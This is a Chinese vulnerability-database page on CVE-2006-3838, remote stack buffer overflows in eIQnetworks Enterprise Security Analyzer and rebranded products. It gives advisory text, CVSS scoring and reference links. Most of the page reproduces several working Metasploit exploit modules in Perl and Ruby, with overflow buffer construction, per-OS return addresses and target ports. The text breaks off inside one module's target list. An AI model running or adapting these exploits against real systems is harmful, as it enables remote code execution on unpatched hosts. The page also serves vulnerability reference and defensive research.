CVE-2006-3838
CVSS10.0
发布时间 :2006-07-26 21:04:00
修订时间 :2011-09-06 00:00:00
NMCOEPS    

[原文]Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe).


[CNNVD]eIQnetworks ESA EnterpriseSecurityAnalyzer.exe LICMGR_ADDLICENSE命令远程缓冲区溢(CNNVD-200607-454)

         eIQnetworks Enterprise Security Analyzer(ESA)是一款企业级的安全管理平台。
         eIQnetworks ESA中默认绑定到TCP/10616端口的EnterpriseSecurityAnalyzer.exe中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        
         EnterpriseSecurityAnalyzer.exe在处理传送给LICMGR_ADDLICENSE命令的超长参数时可能会触发栈溢出,导致执行任意指令。
         <**>

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3838
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3838
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200607-454
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/513068
(UNKNOWN)  CERT-VN  VU#513068
http://xforce.iss.net/xforce/xfdb/27954
(UNKNOWN)  XF  eiqnetworks-esa-monitoring-bo(27954)
http://xforce.iss.net/xforce/xfdb/27953
(UNKNOWN)  XF  eiqnetworks-esa-topology-bo(27953)
http://xforce.iss.net/xforce/xfdb/27952
(UNKNOWN)  XF  eiqnetworks-esa-licensemanager-bo(27952)
http://xforce.iss.net/xforce/xfdb/27951
(UNKNOWN)  XF  eiqnetworks-esa-syslog-command-bo(27951)
http://xforce.iss.net/xforce/xfdb/27950
(UNKNOWN)  XF  eiqnetworks-esa-syslog-string-bo(27950)
http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
(UNKNOWN)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-06-024.html
http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
(UNKNOWN)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
http://www.vupen.com/english/advisories/2006/3010
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3010
http://www.vupen.com/english/advisories/2006/3009
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3009
http://www.vupen.com/english/advisories/2006/3008
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3008
http://www.vupen.com/english/advisories/2006/3007
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3007
http://www.vupen.com/english/advisories/2006/3006
(VENDOR_ADVISORY)  VUPEN  ADV-2006-3006
http://www.vupen.com/english/advisories/2006/2985
(VENDOR_ADVISORY)  VUPEN  ADV-2006-2985
http://www.tippingpoint.com/security/advisories/TSRT-06-07.html
(UNKNOWN)  MISC  http://www.tippingpoint.com/security/advisories/TSRT-06-07.html
http://www.tippingpoint.com/security/advisories/TSRT-06-04.html
(UNKNOWN)  MISC  http://www.tippingpoint.com/security/advisories/TSRT-06-04.html
http://www.tippingpoint.com/security/advisories/TSRT-06-03.html
(VENDOR_ADVISORY)  MISC  http://www.tippingpoint.com/security/advisories/TSRT-06-03.html
http://www.securityfocus.com/bid/19167
(UNKNOWN)  BID  19167
http://www.securityfocus.com/bid/19165
(UNKNOWN)  BID  19165
http://www.securityfocus.com/bid/19164
(UNKNOWN)  BID  19164
http://www.securityfocus.com/bid/19163
(UNKNOWN)  BID  19163
http://www.securityfocus.com/archive/1/archive/1/441200/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060725 TSRT-06-03: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerabilities
http://www.securityfocus.com/archive/1/archive/1/441198/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060725 TSRT-06-04: eIQnetworks Enterprise Security Analyzer Topology Server Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/441197/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060725 ZDI-06-023: eIQNetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerability
http://www.securityfocus.com/archive/1/archive/1/441195/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060725 ZDI-06-024: eIQNetworks Enterprise Security Analyzer License Manager Buffer Overflow Vulnerability
http://www.osvdb.org/27528
(UNKNOWN)  OSVDB  27528
http://www.osvdb.org/27527
(UNKNOWN)  OSVDB  27527
http://www.osvdb.org/27526
(UNKNOWN)  OSVDB  27526
http://www.osvdb.org/27525
(UNKNOWN)  OSVDB  27525
http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf
(UNKNOWN)  CONFIRM  http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf
http://securitytracker.com/id?1016580
(UNKNOWN)  SECTRACK  1016580
http://secunia.com/advisories/21218
(VENDOR_ADVISORY)  SECUNIA  21218
http://secunia.com/advisories/21217
(VENDOR_ADVISORY)  SECUNIA  21217
http://secunia.com/advisories/21215
(VENDOR_ADVISORY)  SECUNIA  21215
http://secunia.com/advisories/21214
(VENDOR_ADVISORY)  SECUNIA  21214
http://secunia.com/advisories/21213
(VENDOR_ADVISORY)  SECUNIA  21213
http://secunia.com/advisories/21211
(VENDOR_ADVISORY)  SECUNIA  21211
http://archive.cert.uni-stuttgart.de/bugtraq/2006/08/msg00152.html
(UNKNOWN)  BUGTRAQ  20060808 TSRT-06-07: eIQnetworks Enterprise Security Analyzer Monitoring Agent Buffer Overflow Vulnerabilities

- 漏洞信息

eIQnetworks ESA EnterpriseSecurityAnalyzer.exe LICMGR_ADDLICENSE命令远程缓冲区溢
危急 缓冲区溢出
2006-07-26 00:00:00 2007-04-16 00:00:00
远程  
         eIQnetworks Enterprise Security Analyzer(ESA)是一款企业级的安全管理平台。
         eIQnetworks ESA中默认绑定到TCP/10616端口的EnterpriseSecurityAnalyzer.exe中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
        
         EnterpriseSecurityAnalyzer.exe在处理传送给LICMGR_ADDLICENSE命令的超长参数时可能会触发栈溢出,导致执行任意指令。
         <**>

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.eiqnetworks.com/

- 漏洞信息 (2074)

eIQnetworks License Manager Remote Buffer Overflow Exploit (1262) (EDBID:2074)
windows remote
2006-07-26 Verified
10616 ri0t
N/A [点击下载]
#!/usr/bin/perl -w

#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs

package Msf::Exploit::EiQ_License_1262; 
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'     => 'EIQ License Manager Overflow',
	'Authors'  => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ],

	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp' ],
	'Priv'  => 0,
	
	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
	
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 10616],
	 },
        'Payload'  =>
	  {
		'Space' => 1262,
		'BadChars'  => "\x00\x0a\x0d\x40\x26",
            },
          'Description'  =>  Pex::Text::Freeform(qq{
	This module exploits the buffer overflow found in the LICMGR_ADDLICENSE
        Field of EIQ networks network analyser this module exploits buffers of 1262 bytes
	in size. This module should work on all rebranded eiq analysers.  Exploitation
	assistance from KF of digital munition.
        }),
          
          
        'DefaultTarget' => 1,
	'Targets' =>
	  [
	        ['Windows 2000 SP0-SP4 English', 0x750316e2],   # call ebx
		['Windows XP English SP1/SP2', 0x77db64dc ],	# jmp ebx
	        ['Windows Server 2003 English SP0/SP1', 0x77d16764 ],   # jmp ebx
	  ],
          
  };
  
  sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}
  
  sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];
        my $nops 	= $self->MakeNops(1262 - length($shellcode));
        my $ret         =  pack("V", $target->[1]);
        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
	
            
        my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
    	  );
          
          if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}
          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
          
          $s->Send("$evil");
          return;
  }

# milw0rm.com [2006-07-26]
		

- 漏洞信息 (2140)

eIQnetworks License Manager Remote Buffer Overflow Exploit (multi) (EDBID:2140)
windows remote
2006-08-07 Verified
10616 ri0t
N/A [点击下载]
#!/usr/bin/perl -w

package Msf::Exploit::EiQ_License; 
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'     => 'EIQ License Manager Overflow',
	'Authors'  => [ 'ri0t ri0t@ri0tnet.net KF kf_list@digitalmunition.com' ],

	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32', 'win2000', 'winxp' ],
	'Priv'  => 0,
	
	'AutoOpts'  => { 'EXITFUNC' => 'seh' },
	
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 10616],
	 },
        'Payload'  =>
	  {
		'Space' => 494,
		'BadChars'  => "\x00\x0a\x0d\x40\x26",
            },
          'Description'  =>  Pex::Text::Freeform(qq{
        This module Exploits a buffer overflow in the LICENCE_MANAGER field of
	EiQ networks Enterprise Security Analyzer.  This bug was found by Titon
	of Bastard Labs. 
        }),
        

	'Refs' =>
	[
		['OSVDB', '27526'],
	],
          
        'DefaultTarget' => 1,
	'Targets' =>
	  [
		['EiQ Enterprise Security Analyzer Buffer size 494 Windows 2000 SP0-SP4 English', 0x750316e2, 494 ],   # call ebx
		['EiQ Enterprise Security Analyzer Buffer size 494 Windows XP English SP1/SP2', 0x77db64dc, 494 ],	# jmp ebx
		['EiQ Enterprise Security Analyzer Buffer size 494 Windwos Server 2003 SP0/SP1', 0x77d16764, 494 ],   # jmp EBX
		['Astaro Report Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
		['Astaro Report Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
		['Astaro Report Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['Fortinet FortiReporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
	        ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
	        ['Fortinet FortiReporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['iPolicy Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
                ['iPolicy Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
		['iPolicy Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
                ['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
		['SanMina Viking Multi-Log Manager (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
                ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
	        ['Secure Computing G2 Security Reporter (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
		['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows 2000 SP0-SP4 English', 0x750316e2, 1262 ],
                ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows XP English SP1/SP2', 0x77db64dc, 1262 ],
	        ['Top Layer Network Security Analyzer (OEM) Buffer size 1262 Windows Server 2003 English SP0/SP1', 0x77d16764, 1262 ],
         ], 
  };
  
  sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}
  
  sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[$target_idx];
	my $nopsize = $target->[2];
        my $nops 	= $self->MakeNops($nopsize - length($shellcode));
        my $ret         =  pack("V", $target->[1]);
        my $evil        = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&";
	
            
        my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
    	  );
          
          if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}
          $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1]));
          
          $s->Send("$evil");
          return;
  }

# milw0rm.com [2006-08-07]
		

- 漏洞信息 (16438)

eIQNetworks ESA Topology DELETEDEVICE Overflow (EDBID:16438)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: eiqnetworks_esa_topology.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'eIQNetworks ESA Topology DELETEDEVICE Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in eIQnetworks
				Enterprise Security Analyzer. During the processing of
				long arguments to the DELETEDEVICE command in the Topology
				server, a stack-based buffer overflow occurs.

				This module has only been tested against ESA v2.1.13.
			},
			'Author'         => 'MC',
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-3838'],
					['OSVDB', '27528'],
					['BID', '19164'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 250,
					'BadChars' => "\x00\x0a\x0d\x20",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
					[ 'Windows XP SP2 English',   { 'Ret' => 0x77d57447 } ],
					[ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 25 2006'
			))

		register_options(
			[
				Opt::RPORT(10628)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		filler  =  rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)

		sploit  =  "DELETEDEVICE&" + filler + payload.encoded

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (16451)

eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow (EDBID:16451)
windows remote
2010-09-20 Verified
0 metasploit
N/A [点击下载]
##
# $Id: eiqnetworks_esa.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in eIQnetworks
				Enterprise Security Analyzer. During the processing of
				long arguments to the LICMGR_ADDLICENSE command, a stack-based
				buffer overflow occurs. This module has only been tested
				against ESA v2.1.13.
			},
			'Author'         => [ 'MC', 'ri0t <ri0t[at]ri0tnet.net>',  'kf' ],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2006-3838'],
					['OSVDB', '27526'],
					['BID', '19163'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-024.html'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ],

					['EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 494 } ],   # call ebx
					['EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2',      { 'Ret' =>  0x77db64dc, 'Offset' => 494 } ],	# jmp ebx
					['EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1',     { 'Ret' =>  0x77d16764, 'Offset' => 494 } ],   # jmp EBX
					['Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English',        { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',       { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2',         { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',{ 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2',   { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',   { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',     { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English',          { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2',            { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',   { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jul 24 2006'
			))

		register_options(
			[
				Opt::RPORT(10616)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		filler =  rand_text_english(1) * (target['Offset'] - payload.encoded.length)
		sploit =  "LICMGR_ADDLICENSE&" + filler + payload.encoded + [target.ret].pack('V') +  "&";

		sock.put(sploit)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83079)

eIQNetworks ESA Topology DELETEDEVICE Overflow (PacketStormID:F83079)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2006-3838
[点击下载]

This Metasploit module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the DELETEDEVICE command in the Topology server, a stacked based buffer overflow occurs. This Metasploit module has only been tested against ESA v2.1.13.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'eIQNetworks ESA Topology DELETEDEVICE Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in eIQnetworks
				Enterprise Security Analyzer. During the processing of
				long arguments to the DELETEDEVICE command in the Topology
				server, a stacked based buffer overflow occurs.

				This module has only been tested against ESA v2.1.13.

			},
			'Author'         => 'MC',
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-3838'],
					['OSVDB', '27528'],
					['BID', '19164'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 250,
					'BadChars' => "\x00\x0a\x0d\x20",
	      			'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
					[ 'Windows XP SP2 English',   { 'Ret' => 0x77d57447 } ],
					[ 'Windows 2003 SP1 English', { 'Ret' => 0x773b24da } ],  
				],

			'Privileged'     => false,

			'DisclosureDate' => 'July 25 2006'
						
			))

			register_options(
			[
				Opt::RPORT(10628)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		filler  =  rand_text_alphanumeric(128) + [target.ret].pack('V') + make_nops(20)

		sploit  =  "DELETEDEVICE&" + filler + payload.encoded  

		sock.put(sploit)

		handler
		disconnect				
	end

end
    

- 漏洞信息 (F83050)

eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow (PacketStormID:F83050)
2009-11-26 00:00:00
ri0t,MC,kf  metasploit.com
exploit,overflow
CVE-2006-3838
[点击下载]

This Metasploit module exploits a stack overflow in eIQnetworks Enterprise Security Analyzer. During the processing of long arguments to the LICMGR_ADDLICENSE command, a stack-based buffer overflow occurs. This Metasploit module has only been tested against ESA v2.1.13.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in eIQnetworks
				Enterprise Security Analyzer. During the processing of
				long arguments to the LICMGR_ADDLICENSE command, a stack-based
				buffer overflow occurs. This module has only been tested
				against ESA v2.1.13.
			},
			'Author'         => [ 'MC', 'ri0t <ri0t[at]ri0tnet.net>',  'kf' ],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2006-3838'],
					['OSVDB', '27526'],
					['BID', '19163'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-024.html'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Payload'        =>
				{
					'Space'    => 400,
					'BadChars' => "\x00",
	      			'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					['EnterpriseSecurityAnalyzerv21 Universal', { 'Ret' => 0x00448187, 'Offset' => 494 } ],  
				
					['EiQ Enterprise Security Analyzer Offset 494 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 494 } ],   # call ebx
					['EiQ Enterprise Security Analyzer Offset 494 Windows XP English SP1/SP2',      { 'Ret' =>  0x77db64dc, 'Offset' => 494 } ],	# jmp ebx
					['EiQ Enterprise Security Analyzer Offset 494 Windows Server 2003 SP0/SP1',     { 'Ret' =>  0x77d16764, 'Offset' => 494 } ],   # jmp EBX
					['Astaro Report Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English',        { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Astaro Report Manager (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Astaro Report Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',       { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows XP English SP1/SP2',         { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Fortinet FortiReporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',{ 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',    { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',          { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['iPolicy Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows 2000 SP0-SP4 English', { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows XP English SP1/SP2',   { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['SanMina Viking Multi-Log Manager (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows 2000 SP0-SP4 English',   { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows XP English SP1/SP2',     { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Secure Computing G2 Security Reporter (OEM) Offset 1262 Windows Server 2003 English SP0/SP1', { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows 2000 SP0-SP4 English',          { 'Ret' =>  0x750316e2, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows XP English SP1/SP2',            { 'Ret' =>  0x77db64dc, 'Offset' => 1262 } ],
					['Top Layer Network Security Analyzer (OEM) Offset 1262 Windows Server 2003 English SP0/SP1',   { 'Ret' =>  0x77d16764, 'Offset' => 1262 } ],					
				],

